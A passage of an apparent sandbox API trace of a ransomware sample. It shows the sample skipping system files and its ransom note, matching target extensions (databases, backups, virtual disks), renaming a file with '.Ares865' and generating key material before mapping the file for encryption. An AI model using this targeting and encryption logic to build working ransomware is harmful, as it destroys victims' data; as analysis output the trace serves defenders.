ftCreationTime.dwHighDateTime=0x1d28825, ftLastAccessTime.dwLowDateTime=0x36fed00, ftLastAccessTime.dwHighDateTime=0x1d28825, ftLastWriteTime.dwLowDateTime=0x36fed00, ftLastWriteTime.dwHighDateTime=0x1d28825, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0072.970] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0072.972] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="aoldtz.exe") returned 1 [0072.973] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".") returned 1 [0072.974] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="..") returned 1 [0072.975] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="windows") returned -1 [0072.975] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="bootmgr") returned 1 [0072.975] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="temp") returned 1 [0072.975] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="pagefile.sys") returned 1 [0072.975] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="boot") returned 1 [0072.976] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="ids.txt") returned 1 [0072.976] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="ntuser.dat") returned 1 [0072.976] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="perflogs") returned 1 [0072.976] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="MSBuild") returned 1 [0072.976] lstrlenW (lpString="vc_runtimeAdditional_x64.msi") returned 28 [0072.976] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 127 [0072.977] lstrcpyW (in: lpString1=0x2cce4ee, lpString2="vc_runtimeAdditional_x64.msi" | out: lpString1="vc_runtimeAdditional_x64.msi") returned="vc_runtimeAdditional_x64.msi" [0072.977] lstrlenW (lpString="vc_runtimeAdditional_x64.msi") returned 28 [0073.002] lstrlenW (lpString="Ares865") returned 7 [0073.002] lstrcmpiW (lpString1="x64.msi", lpString2="Ares865") returned 1 [0073.002] lstrlenW (lpString=".dll") returned 4 [0073.002] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".dll") returned 1 [0073.002] lstrlenW (lpString=".lnk") returned 4 [0073.002] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".lnk") returned 1 [0073.002] lstrlenW (lpString=".ini") returned 4 [0073.002] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".ini") returned 1 [0073.002] lstrlenW (lpString=".sys") returned 4 [0073.002] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".sys") returned 1 [0073.002] lstrlenW (lpString="vc_runtimeAdditional_x64.msi") returned 28 [0073.002] lstrlenW (lpString="bak") returned 3 [0073.002] lstrcmpiW (lpString1="msi", lpString2="bak") returned 1 [0073.002] lstrlenW (lpString="ba_") returned 3 [0073.002] lstrcmpiW (lpString1="msi", lpString2="ba_") returned 1 [0073.002] lstrlenW (lpString="dbb") returned 3 [0073.002] lstrcmpiW (lpString1="msi", lpString2="dbb") returned 1 [0073.003] lstrlenW (lpString="vmdk") returned 4 [0073.003] lstrcmpiW (lpString1=".msi", lpString2="vmdk") returned -1 [0073.003] lstrlenW (lpString="rar") returned 3 [0073.003] lstrcmpiW (lpString1="msi", lpString2="rar") returned -1 [0073.003] lstrlenW (lpString="zip") returned 3 [0073.003] lstrcmpiW (lpString1="msi", lpString2="zip") returned -1 [0073.003] lstrlenW (lpString="tgz") returned 3 [0073.003] lstrcmpiW (lpString1="msi", lpString2="tgz") returned -1 [0073.003] lstrlenW (lpString="vbox") returned 4 [0073.003] lstrcmpiW (lpString1=".msi", lpString2="vbox") returned -1 [0073.003] lstrlenW (lpString="vdi") returned 3 [0073.003] lstrcmpiW (lpString1="msi", lpString2="vdi") returned -1 [0073.003] lstrlenW (lpString="vhd") returned 3 [0073.003] lstrcmpiW (lpString1="msi", lpString2="vhd") returned -1 [0073.003] lstrlenW (lpString="vhdx") returned 4 [0073.003] lstrcmpiW (lpString1=".msi", lpString2="vhdx") returned -1 [0073.003] lstrlenW (lpString="avhd") returned 4 [0073.003] lstrcmpiW (lpString1=".msi", lpString2="avhd") returned -1 [0073.003] lstrlenW (lpString="db") returned 2 [0073.003] lstrcmpiW (lpString1="si", lpString2="db") returned 1 [0073.003] lstrlenW (lpString="db2") returned 3 [0073.003] lstrcmpiW (lpString1="msi", lpString2="db2") returned 1 [0073.003] lstrlenW (lpString="db3") returned 3 [0073.003] lstrcmpiW (lpString1="msi", lpString2="db3") returned 1 [0073.003] lstrlenW (lpString="dbf") returned 3 [0073.003] lstrcmpiW (lpString1="msi", lpString2="dbf") returned 1 [0073.003] lstrlenW (lpString="mdf") returned 3 [0073.003] lstrcmpiW (lpString1="msi", lpString2="mdf") returned 1 [0073.003] lstrlenW (lpString="mdb") returned 3 [0073.003] lstrcmpiW (lpString1="msi", lpString2="mdb") returned 1 [0073.003] lstrlenW (lpString="sql") returned 3 [0073.003] lstrcmpiW (lpString1="msi", lpString2="sql") returned -1 [0073.003] lstrlenW (lpString="sqlite") returned 6 [0073.003] lstrcmpiW (lpString1="64.msi", lpString2="sqlite") returned -1 [0073.003] lstrlenW (lpString="sqlite3") returned 7 [0073.003] lstrcmpiW (lpString1="x64.msi", lpString2="sqlite3") returned 1 [0073.003] lstrlenW (lpString="sqlitedb") returned 8 [0073.003] lstrcmpiW (lpString1="_x64.msi", lpString2="sqlitedb") returned -1 [0073.004] lstrlenW (lpString="xml") returned 3 [0073.004] lstrcmpiW (lpString1="msi", lpString2="xml") returned -1 [0073.004] lstrlenW (lpString="$er") returned 3 [0073.004] lstrcmpiW (lpString1="msi", lpString2="$er") returned 1 [0073.004] lstrlenW (lpString="4dd") returned 3 [0073.004] lstrcmpiW (lpString1="msi", lpString2="4dd") returned 1 [0073.004] lstrlenW (lpString="4dl") returned 3 [0073.004] lstrcmpiW (lpString1="msi", lpString2="4dl") returned 1 [0073.004] lstrlenW (lpString="^^^") returned 3 [0073.004] lstrcmpiW (lpString1="msi", lpString2="^^^") returned 1 [0073.004] lstrlenW (lpString="abs") returned 3 [0073.004] lstrcmpiW (lpString1="msi", lpString2="abs") returned 1 [0073.004] lstrlenW (lpString="abx") returned 3 [0073.004] lstrcmpiW (lpString1="msi", lpString2="abx") returned 1 [0073.004] lstrlenW (lpString="accdb") returned 5 [0073.004] lstrcmpiW (lpString1="4.msi", lpString2="accdb") returned -1 [0073.004] lstrlenW (lpString="accdc") returned 5 [0073.004] lstrcmpiW (lpString1="4.msi", lpString2="accdc") returned -1 [0073.004] lstrlenW (lpString="accde") returned 5 [0073.004] lstrcmpiW (lpString1="4.msi", lpString2="accde") returned -1 [0073.004] lstrlenW (lpString="accdr") returned 5 [0073.004] lstrcmpiW (lpString1="4.msi", lpString2="accdr") returned -1 [0073.004] lstrlenW (lpString="accdt") returned 5 [0073.004] lstrcmpiW (lpString1="4.msi", lpString2="accdt") returned -1 [0073.004] lstrlenW (lpString="accdw") returned 5 [0073.004] lstrcmpiW (lpString1="4.msi", lpString2="accdw") returned -1 [0073.004] lstrlenW (lpString="accft") returned 5 [0073.004] lstrcmpiW (lpString1="4.msi", lpString2="accft") returned -1 [0073.004] lstrlenW (lpString="adb") returned 3 [0073.004] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0073.004] lstrlenW (lpString="adb") returned 3 [0073.004] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0073.004] lstrlenW (lpString="ade") returned 3 [0073.004] lstrcmpiW (lpString1="msi", lpString2="ade") returned 1 [0073.004] lstrlenW (lpString="adf") returned 3 [0073.004] lstrcmpiW (lpString1="msi", lpString2="adf") returned 1 [0073.004] lstrlenW (lpString="adn") returned 3 [0073.004] lstrcmpiW (lpString1="msi", lpString2="adn") returned 1 [0073.004] lstrlenW (lpString="adp") returned 3 [0073.005] lstrcmpiW (lpString1="msi", lpString2="adp") returned 1 [0073.005] lstrlenW (lpString="alf") returned 3 [0073.005] lstrcmpiW (lpString1="msi", lpString2="alf") returned 1 [0073.005] lstrlenW (lpString="ask") returned 3 [0073.005] lstrcmpiW (lpString1="msi", lpString2="ask") returned 1 [0073.005] lstrlenW (lpString="btr") returned 3 [0073.005] lstrcmpiW (lpString1="msi", lpString2="btr") returned 1 [0073.005] lstrlenW (lpString="cat") returned 3 [0073.005] lstrcmpiW (lpString1="msi", lpString2="cat") returned 1 [0073.005] lstrlenW (lpString="cdb") returned 3 [0073.005] lstrcmpiW (lpString1="msi", lpString2="cdb") returned 1 [0073.005] lstrlenW (lpString="ckp") returned 3 [0073.005] lstrcmpiW (lpString1="msi", lpString2="ckp") returned 1 [0073.005] lstrlenW (lpString="cma") returned 3 [0073.005] lstrcmpiW (lpString1="msi", lpString2="cma") returned 1 [0073.005] lstrlenW (lpString="cpd") returned 3 [0073.005] lstrcmpiW (lpString1="msi", lpString2="cpd") returned 1 [0073.005] lstrlenW (lpString="dacpac") returned 6 [0073.005] lstrcmpiW (lpString1="64.msi", lpString2="dacpac") returned -1 [0073.005] lstrlenW (lpString="dad") returned 3 [0073.005] lstrcmpiW (lpString1="msi", lpString2="dad") returned 1 [0073.005] lstrlenW (lpString="dadiagrams") returned 10 [0073.005] lstrcmpiW (lpString1="al_x64.msi", lpString2="dadiagrams") returned -1 [0073.005] lstrlenW (lpString="daschema") returned 8 [0073.005] lstrcmpiW (lpString1="_x64.msi", lpString2="daschema") returned -1 [0073.005] lstrlenW (lpString="db-journal") returned 10 [0073.005] lstrcmpiW (lpString1="al_x64.msi", lpString2="db-journal") returned -1 [0073.005] lstrlenW (lpString="db-shm") returned 6 [0073.005] lstrcmpiW (lpString1="64.msi", lpString2="db-shm") returned -1 [0073.005] lstrlenW (lpString="db-wal") returned 6 [0073.005] lstrcmpiW (lpString1="64.msi", lpString2="db-wal") returned -1 [0073.005] lstrlenW (lpString="dbc") returned 3 [0073.005] lstrcmpiW (lpString1="msi", lpString2="dbc") returned 1 [0073.005] lstrlenW (lpString="dbs") returned 3 [0073.005] lstrcmpiW (lpString1="msi", lpString2="dbs") returned 1 [0073.005] lstrlenW (lpString="dbt") returned 3 [0073.005] lstrcmpiW (lpString1="msi", lpString2="dbt") returned 1 [0073.005] lstrlenW (lpString="dbv") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="dbv") returned 1 [0073.006] lstrlenW (lpString="dbx") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="dbx") returned 1 [0073.006] lstrlenW (lpString="dcb") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="dcb") returned 1 [0073.006] lstrlenW (lpString="dct") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="dct") returned 1 [0073.006] lstrlenW (lpString="dcx") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="dcx") returned 1 [0073.006] lstrlenW (lpString="ddl") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="ddl") returned 1 [0073.006] lstrlenW (lpString="dlis") returned 4 [0073.006] lstrcmpiW (lpString1=".msi", lpString2="dlis") returned -1 [0073.006] lstrlenW (lpString="dp1") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="dp1") returned 1 [0073.006] lstrlenW (lpString="dqy") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="dqy") returned 1 [0073.006] lstrlenW (lpString="dsk") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="dsk") returned 1 [0073.006] lstrlenW (lpString="dsn") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="dsn") returned 1 [0073.006] lstrlenW (lpString="dtsx") returned 4 [0073.006] lstrcmpiW (lpString1=".msi", lpString2="dtsx") returned -1 [0073.006] lstrlenW (lpString="dxl") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="dxl") returned 1 [0073.006] lstrlenW (lpString="eco") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="eco") returned 1 [0073.006] lstrlenW (lpString="ecx") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="ecx") returned 1 [0073.006] lstrlenW (lpString="edb") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="edb") returned 1 [0073.006] lstrlenW (lpString="epim") returned 4 [0073.006] lstrcmpiW (lpString1=".msi", lpString2="epim") returned -1 [0073.006] lstrlenW (lpString="fcd") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="fcd") returned 1 [0073.006] lstrlenW (lpString="fdb") returned 3 [0073.006] lstrcmpiW (lpString1="msi", lpString2="fdb") returned 1 [0073.007] lstrlenW (lpString="fic") returned 3 [0073.007] lstrcmpiW (lpString1="msi", lpString2="fic") returned 1 [0073.007] lstrlenW (lpString="flexolibrary") returned 12 [0073.007] lstrcmpiW (lpString1="onal_x64.msi", lpString2="flexolibrary") returned 1 [0073.007] lstrlenW (lpString="fm5") returned 3 [0073.007] lstrcmpiW (lpString1="msi", lpString2="fm5") returned 1 [0073.007] lstrlenW (lpString="fmp") returned 3 [0073.007] lstrcmpiW (lpString1="msi", lpString2="fmp") returned 1 [0073.007] lstrlenW (lpString="fmp12") returned 5 [0073.007] lstrcmpiW (lpString1="4.msi", lpString2="fmp12") returned -1 [0073.007] lstrlenW (lpString="fmpsl") returned 5 [0073.007] lstrcmpiW (lpString1="4.msi", lpString2="fmpsl") returned -1 [0073.007] lstrlenW (lpString="fol") returned 3 [0073.007] lstrcmpiW (lpString1="msi", lpString2="fol") returned 1 [0073.007] lstrlenW (lpString="fp3") returned 3 [0073.007] lstrcmpiW (lpString1="msi", lpString2="fp3") returned 1 [0073.007] lstrlenW (lpString="fp4") returned 3 [0073.007] lstrcmpiW (lpString1="msi", lpString2="fp4") returned 1 [0073.007] lstrlenW (lpString="fp5") returned 3 [0073.007] lstrcmpiW (lpString1="msi", lpString2="fp5") returned 1 [0073.007] lstrlenW (lpString="fp7") returned 3 [0073.007] lstrcmpiW (lpString1="msi", lpString2="fp7") returned 1 [0073.007] lstrlenW (lpString="fpt") returned 3 [0073.007] lstrcmpiW (lpString1="msi", lpString2="fpt") returned 1 [0073.007] lstrlenW (lpString="frm") returned 3 [0073.007] lstrcmpiW (lpString1="msi", lpString2="frm") returned 1 [0073.007] lstrlenW (lpString="gdb") returned 3 [0073.007] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0073.007] lstrlenW (lpString="gdb") returned 3 [0073.007] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0073.007] lstrlenW (lpString="grdb") returned 4 [0073.007] lstrcmpiW (lpString1=".msi", lpString2="grdb") returned -1 [0073.007] lstrlenW (lpString="gwi") returned 3 [0073.007] lstrcmpiW (lpString1="msi", lpString2="gwi") returned 1 [0073.007] lstrlenW (lpString="hdb") returned 3 [0073.007] lstrcmpiW (lpString1="msi", lpString2="hdb") returned 1 [0073.007] lstrlenW (lpString="his") returned 3 [0073.008] lstrcmpiW (lpString1="msi", lpString2="his") returned 1 [0073.008] lstrlenW (lpString="ib") returned 2 [0073.008] lstrcmpiW (lpString1="si", lpString2="ib") returned 1 [0073.008] lstrlenW (lpString="idb") returned 3 [0073.008] lstrcmpiW (lpString1="msi", lpString2="idb") returned 1 [0073.008] lstrlenW (lpString="ihx") returned 3 [0073.008] lstrcmpiW (lpString1="msi", lpString2="ihx") returned 1 [0073.008] lstrlenW (lpString="itdb") returned 4 [0073.008] lstrcmpiW (lpString1=".msi", lpString2="itdb") returned -1 [0073.008] lstrlenW (lpString="itw") returned 3 [0073.008] lstrcmpiW (lpString1="msi", lpString2="itw") returned 1 [0073.008] lstrlenW (lpString="jet") returned 3 [0073.008] lstrcmpiW (lpString1="msi", lpString2="jet") returned 1 [0073.008] lstrlenW (lpString="jtx") returned 3 [0073.008] lstrcmpiW (lpString1="msi", lpString2="jtx") returned 1 [0073.008] lstrlenW (lpString="kdb") returned 3 [0073.008] lstrcmpiW (lpString1="msi", lpString2="kdb") returned 1 [0073.008] lstrlenW (lpString="kexi") returned 4 [0073.008] lstrcmpiW (lpString1=".msi", lpString2="kexi") returned -1 [0073.008] lstrlenW (lpString="kexic") returned 5 [0073.008] lstrcmpiW (lpString1="4.msi", lpString2="kexic") returned -1 [0073.008] lstrlenW (lpString="kexis") returned 5 [0073.008] lstrcmpiW (lpString1="4.msi", lpString2="kexis") returned -1 [0073.008] lstrlenW (lpString="lgc") returned 3 [0073.008] lstrcmpiW (lpString1="msi", lpString2="lgc") returned 1 [0073.008] lstrlenW (lpString="lwx") returned 3 [0073.008] lstrcmpiW (lpString1="msi", lpString2="lwx") returned 1 [0073.008] lstrlenW (lpString="maf") returned 3 [0073.008] lstrcmpiW (lpString1="msi", lpString2="maf") returned 1 [0073.008] lstrlenW (lpString="maq") returned 3 [0073.008] lstrcmpiW (lpString1="msi", lpString2="maq") returned 1 [0073.008] lstrlenW (lpString="mar") returned 3 [0073.008] lstrcmpiW (lpString1="msi", lpString2="mar") returned 1 [0073.008] lstrlenW (lpString="marshal") returned 7 [0073.008] lstrcmpiW (lpString1="x64.msi", lpString2="marshal") returned 1 [0073.008] lstrlenW (lpString="mas") returned 3 [0073.008] lstrcmpiW (lpString1="msi", lpString2="mas") returned 1 [0073.008] lstrlenW (lpString="mav") returned 3 [0073.008] lstrcmpiW (lpString1="msi", lpString2="mav") returned 1 [0073.009] lstrlenW (lpString="maw") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="maw") returned 1 [0073.009] lstrlenW (lpString="mdbhtml") returned 7 [0073.009] lstrcmpiW (lpString1="x64.msi", lpString2="mdbhtml") returned 1 [0073.009] lstrlenW (lpString="mdn") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="mdn") returned 1 [0073.009] lstrlenW (lpString="mdt") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="mdt") returned 1 [0073.009] lstrlenW (lpString="mfd") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="mfd") returned 1 [0073.009] lstrlenW (lpString="mpd") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="mpd") returned 1 [0073.009] lstrlenW (lpString="mrg") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="mrg") returned 1 [0073.009] lstrlenW (lpString="mud") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="mud") returned -1 [0073.009] lstrlenW (lpString="mwb") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="mwb") returned -1 [0073.009] lstrlenW (lpString="myd") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="myd") returned -1 [0073.009] lstrlenW (lpString="ndf") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="ndf") returned -1 [0073.009] lstrlenW (lpString="nnt") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="nnt") returned -1 [0073.009] lstrlenW (lpString="nrmlib") returned 6 [0073.009] lstrcmpiW (lpString1="64.msi", lpString2="nrmlib") returned -1 [0073.009] lstrlenW (lpString="ns2") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="ns2") returned -1 [0073.009] lstrlenW (lpString="ns3") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="ns3") returned -1 [0073.009] lstrlenW (lpString="ns4") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="ns4") returned -1 [0073.009] lstrlenW (lpString="nsf") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="nsf") returned -1 [0073.009] lstrlenW (lpString="nv") returned 2 [0073.009] lstrcmpiW (lpString1="si", lpString2="nv") returned 1 [0073.009] lstrlenW (lpString="nv2") returned 3 [0073.009] lstrcmpiW (lpString1="msi", lpString2="nv2") returned -1 [0073.010] lstrlenW (lpString="nwdb") returned 4 [0073.010] lstrcmpiW (lpString1=".msi", lpString2="nwdb") returned -1 [0073.010] lstrlenW (lpString="nyf") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="nyf") returned -1 [0073.010] lstrlenW (lpString="odb") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0073.010] lstrlenW (lpString="odb") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0073.010] lstrlenW (lpString="oqy") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="oqy") returned -1 [0073.010] lstrlenW (lpString="ora") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="ora") returned -1 [0073.010] lstrlenW (lpString="orx") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="orx") returned -1 [0073.010] lstrlenW (lpString="owc") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="owc") returned -1 [0073.010] lstrlenW (lpString="p96") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="p96") returned -1 [0073.010] lstrlenW (lpString="p97") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="p97") returned -1 [0073.010] lstrlenW (lpString="pan") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="pan") returned -1 [0073.010] lstrlenW (lpString="pdb") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="pdb") returned -1 [0073.010] lstrlenW (lpString="pdm") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="pdm") returned -1 [0073.010] lstrlenW (lpString="pnz") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="pnz") returned -1 [0073.010] lstrlenW (lpString="qry") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="qry") returned -1 [0073.010] lstrlenW (lpString="qvd") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="qvd") returned -1 [0073.010] lstrlenW (lpString="rbf") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="rbf") returned -1 [0073.010] lstrlenW (lpString="rctd") returned 4 [0073.010] lstrcmpiW (lpString1=".msi", lpString2="rctd") returned -1 [0073.010] lstrlenW (lpString="rod") returned 3 [0073.010] lstrcmpiW (lpString1="msi", lpString2="rod") returned -1 [0073.011] lstrlenW (lpString="rodx") returned 4 [0073.011] lstrcmpiW (lpString1=".msi", lpString2="rodx") returned -1 [0073.011] lstrlenW (lpString="rpd") returned 3 [0073.011] lstrcmpiW (lpString1="msi", lpString2="rpd") returned -1 [0073.011] lstrlenW (lpString="rsd") returned 3 [0073.011] lstrcmpiW (lpString1="msi", lpString2="rsd") returned -1 [0073.011] lstrlenW (lpString="sas7bdat") returned 8 [0073.011] lstrcmpiW (lpString1="_x64.msi", lpString2="sas7bdat") returned -1 [0073.011] lstrlenW (lpString="sbf") returned 3 [0073.011] lstrcmpiW (lpString1="msi", lpString2="sbf") returned -1 [0073.011] lstrlenW (lpString="scx") returned 3 [0073.011] lstrcmpiW (lpString1="msi", lpString2="scx") returned -1 [0073.011] lstrlenW (lpString="sdb") returned 3 [0073.011] lstrcmpiW (lpString1="msi", lpString2="sdb") returned -1 [0073.011] lstrlenW (lpString="sdc") returned 3 [0073.011] lstrcmpiW (lpString1="msi", lpString2="sdc") returned -1 [0073.011] lstrlenW (lpString="sdf") returned 3 [0073.011] lstrcmpiW (lpString1="msi", lpString2="sdf") returned -1 [0073.011] lstrlenW (lpString="sis") returned 3 [0073.011] lstrcmpiW (lpString1="msi", lpString2="sis") returned -1 [0073.011] lstrlenW (lpString="spq") returned 3 [0073.011] lstrcmpiW (lpString1="msi", lpString2="spq") returned -1 [0073.011] lstrlenW (lpString="te") returned 2 [0073.011] lstrcmpiW (lpString1="si", lpString2="te") returned -1 [0073.011] lstrlenW (lpString="teacher") returned 7 [0073.011] lstrcmpiW (lpString1="x64.msi", lpString2="teacher") returned 1 [0073.011] lstrlenW (lpString="tmd") returned 3 [0073.011] lstrcmpiW (lpString1="msi", lpString2="tmd") returned -1 [0073.011] lstrlenW (lpString="tps") returned 3 [0073.011] lstrcmpiW (lpString1="msi", lpString2="tps") returned -1 [0073.011] lstrlenW (lpString="trc") returned 3 [0073.011] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0073.011] lstrlenW (lpString="trc") returned 3 [0073.011] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0073.011] lstrlenW (lpString="trm") returned 3 [0073.011] lstrcmpiW (lpString1="msi", lpString2="trm") returned -1 [0073.011] lstrlenW (lpString="udb") returned 3 [0073.011] lstrcmpiW (lpString1="msi", lpString2="udb") returned -1 [0073.011] lstrlenW (lpString="udl") returned 3 [0073.012] lstrcmpiW (lpString1="msi", lpString2="udl") returned -1 [0073.012] lstrlenW (lpString="usr") returned 3 [0073.012] lstrcmpiW (lpString1="msi", lpString2="usr") returned -1 [0073.012] lstrlenW (lpString="v12") returned 3 [0073.012] lstrcmpiW (lpString1="msi", lpString2="v12") returned -1 [0073.012] lstrlenW (lpString="vis") returned 3 [0073.012] lstrcmpiW (lpString1="msi", lpString2="vis") returned -1 [0073.012] lstrlenW (lpString="vpd") returned 3 [0073.012] lstrcmpiW (lpString1="msi", lpString2="vpd") returned -1 [0073.012] lstrlenW (lpString="vvv") returned 3 [0073.012] lstrcmpiW (lpString1="msi", lpString2="vvv") returned -1 [0073.012] lstrlenW (lpString="wdb") returned 3 [0073.012] lstrcmpiW (lpString1="msi", lpString2="wdb") returned -1 [0073.012] lstrlenW (lpString="wmdb") returned 4 [0073.012] lstrcmpiW (lpString1=".msi", lpString2="wmdb") returned -1 [0073.012] lstrlenW (lpString="wrk") returned 3 [0073.012] lstrcmpiW (lpString1="msi", lpString2="wrk") returned -1 [0073.012] lstrlenW (lpString="xdb") returned 3 [0073.012] lstrcmpiW (lpString1="msi", lpString2="xdb") returned -1 [0073.012] lstrlenW (lpString="xld") returned 3 [0073.012] lstrcmpiW (lpString1="msi", lpString2="xld") returned -1 [0073.012] lstrlenW (lpString="xmlff") returned 5 [0073.012] lstrcmpiW (lpString1="4.msi", lpString2="xmlff") returned -1 [0073.012] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.Ares865") returned 155 [0073.012] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.ares865"), dwFlags=0x1) returned 1 [0073.050] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0073.050] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=143360) returned 1 [0073.050] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0073.054] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0073.054] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0073.054] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0073.054] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0073.054] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.055] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x23300, lpName=0x0) returned 0x120 [0073.056] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23300) returned 0x420000 [0073.064] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 